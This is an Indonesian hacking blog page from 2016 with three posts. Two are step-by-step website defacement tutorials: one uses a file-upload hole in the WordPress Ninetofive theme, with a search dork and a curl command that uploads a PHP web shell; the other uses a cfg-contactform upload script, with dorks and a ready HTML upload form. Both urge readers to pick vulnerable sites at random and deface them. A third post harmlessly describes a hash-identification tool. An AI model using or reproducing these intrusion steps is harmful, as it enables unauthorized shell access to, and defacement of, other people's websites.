Minggu, 29 Mei 2016

WordPress Theme Ninetofive Remote Exploit


Hello World; Pagi Fans, Please Say Hello Haters :*
yoeeh Gengs, Lanjut lagii Walking Blog :D , dah Lama nih gak Share Bug di Theme CMS WordPress. xixixhi, kali ini Nue akan Share Tutorial Deface dengan WordPress Theme Ninetofive Remote Exploit. iseng2 share eXploit lawas, kali aja masih crootz wkwkw.


Lanjut intip tutorialnya ;*


Bahan:
CGI Shell ( touch me senpai :'v ) | ( touche me Senpai :'D )

Dork:
inurl:/wp-content/themes/ninetofive
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

eXploit: /wp-content/themes/ninetofive/scripts/doajaxfileupload.php

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/wp-content/themes/ninetofive/scripts/doajaxfileupload.php

3. Vulnerability ~ {"error":"No files were uploaded."}

Kurang Lebih sih gini wkwkw
4. Setelah itu kita buka CGI Shell nya, tapi sebelumnya upload dulu CGI Shell nya ke web


Seterah Lu, mau Upload di shell bekasan lu, atau cpanel lu :p
5. Lalu klik CGI Shell ( liat di atas gambar )
6. Setelah di klik, masukin password nya, password nya adalah webr00t
Masukin password nya, Lalu Klik Enter
7. Jika sudah login, klik bacaan 'Upload File'



8. Lalu upload shell kalian
9. Setelah diupload, tinggal kita eksekusi :D masukin perintah berikut dan Tekan enter :D
curl -v -F "qqfile=@namashellkalian.php" "target.coli/wp-content/themes/ninetofive/scripts/doajaxfileupload.php

10. Jika berhasil akan seperti gambar dibawah ini :


Nanti akan muncul random shell
11. Set-Cookie: magnetAttached_1=uploads%2F74e2f7bf88287621d2949f9851blabla.php; expires=blabla (nama shell tergantung pas worknya sih, pokoknya sesuaikan aja sama yg tampil dilayar lu pas sukses jalanin commandnya ;* )

12. Akses Shell: 
target.coli/wp-content/uploads/tahun/bulan/shell.php
target.coli/wp-content/themes/ninetofive/scripts/uploads/shell.php
note: shell akses ada 2, cobaiin aja satu2 awkwakwka >.< , KALO BERHASIL YA NANTI MUNCUL SHELL LU DI WEB TARGET ;*


Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) )) 
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai karya para WebMaster ;*


"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs


Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART

Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked ~
Sekian dan semoga bermanfaat .. terimakasih

Source and thanks toeitaro attacker



./Nuenomaru


Sukses adalah cara balas Dendam terbaik, utk orang2 yg memandang Lu Sebelah Mata







Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Tutorial Identifikasi Tipe HASH dengan HASH-IDENTIFIER


Hello World ; Sore Fans, Please Say Hello Haters :*
Kali ini gue bakal Share, Tutorial Identifikasi Tipe HASH dengan HASH-IDENTIFIER Di Linux, apa sih itu Hash o.O ? gue yakin lu lu pada dh tauu wkwk. ape lagi yg sering bergelut di dunia cyber dan tool ini membantu banget diDunia perjembutan sekarang.
disini gua mempraktekannya di Kali Linux, silahkan cobain sendiri di Distro2 kesayangan anda :p wkwkw

Langsung intip Tutorial Bebz ;*


Hash-ID Mendukung berbagai Format Hash :
ADLER-32
CRC-32
CRC-32B
CRC-16
CRC-16-CCITT
DES(Unix)
FCS-16
GHash-32-3
GHash-32-5
GOST R 34.11-94
Haval-160
Haval-192 110080 ,Haval-224 114080 ,Haval-256
Lineage II C4
Domain Cached Credentials
XOR-32
MD5(Half)
MD5(Middle)
MySQL
MD5(phpBB3)
MD5(Unix)
MD5(Wordpress)
MD5(APR)
Haval-128
MD2
MD4
MD5
MD5(HMAC(Wordpress))
NTLM
RAdmin v2.x
RipeMD-128
SNEFRU-128
Tiger-128
MySQL5 - SHA-1(SHA-1($pass))
MySQL 160bit - SHA-1(SHA-1($pass))
RipeMD-160
SHA-1
SHA-1(MaNGOS)
Tiger-160
Tiger-192
md5($pass.$salt) - Joomla
SHA-1(Django)
SHA-224
RipeMD-256
SNEFRU-256
md5($pass.$salt) - Joomla
SAM - (LM_hash:NT_hash)
SHA-256(Django)
RipeMD-320
SHA-384
SHA-256
SHA-384(Django)
SHA-512
Whirlpool
And more…

Penggunaan Hash - Identifier

- BackBox User : buka terminal ketik : hash-id
- Kali Linux User : buka terminal ketik : hash-identifier
- Distro Lain/Windows : Buka CMD  ketik : python Hash_ID_v1.1.py

Note: Jika Belum punya tool hash-id bisa download di  Hash-ID

Percobaan Identifikasi Hash ( Result MD5 )
Nue membuat tutorial ini karena banyak nya yang menanyakan ini tipe hash apa dll ..
Untuk Selebihnya silahkan explore sendiri, xixixhi semoga membantu diDunia Perjembutan Mu ;3

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")



Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy GNU/Linux
Sekian dan semoga bermanfaat .. terimakasih



Source and Thanks to: Dompu Linuxer



./Nuenomaru


cuma sekumpulan n00b Penikmat GNU/Linux







Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Jumat, 27 Mei 2016

eXploit CFG-CONTACTFORM VULNERABILITY FILE UPLOAD

Hello World; Pagi Fans, Please Say Hello Haters :*
yoeeh Gengs, Lanjut lagii Walking Blog :D ,karna ini hari sabtu, jadi Gua Post artikelnya pagi, karena Nanti malem mau malmingan gengs :'v wkkwkw.
Kali ini Nue akan Share Tutorial Deface dengan eXploit CFG-CONTACTFORM VULNERABILITY FILE UPLOAD.
Iseng2 Share eXploit Lawas, kali aja masih crootz xixixhihi, btw Sekalian nyicipin WebShell BACKBOX INDONESIA WEB SHELL V1.0 (BASED ON INDOXPLOIT SHELL) dari Kang hightech.


Play with Me , Baby <3


Dork:
"/cfg-contactform-1/" 
"/cfg-contactform-2/"
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

# Disini exploitnya tergantung contact form yg keberapa mas bro,
/[path]/cfg-contactform-1/inc/upload.php

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/cfg-contactform-1/inc/upload.php

3. Vulnerability ~ {"filename":" -001."}



CSRF Upload:
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
*copy CSRF Upload nya, edit dan masukan target lu di "target", save dgn ekstensi .html
*Lalu buka dgn browser

4. Lalu Upload Shell Lu, Jika sukses akan Muncul nama Shell Lu.


bukan tukang PhP kok girls :'v wkkw
5. Shell Akses:/[path]/cfg-contactform-1/upload/namashell.php
*trgantung Dork yg digunakan BossQ ;3



untuk code PHP disini 

Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) )) 
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai karya para WebMaster ;*

"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Joomla Hacked~
Sekian dan semoga bermanfaat .. terimakasih

Source and thanks to:haurgeulis Security

./Nuenomaru


tidak perlu muncul ke permukaan , yang penting tetap bergerilya






Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i
 

ande ande lumoet Template by Ipietoon Cute Blog Design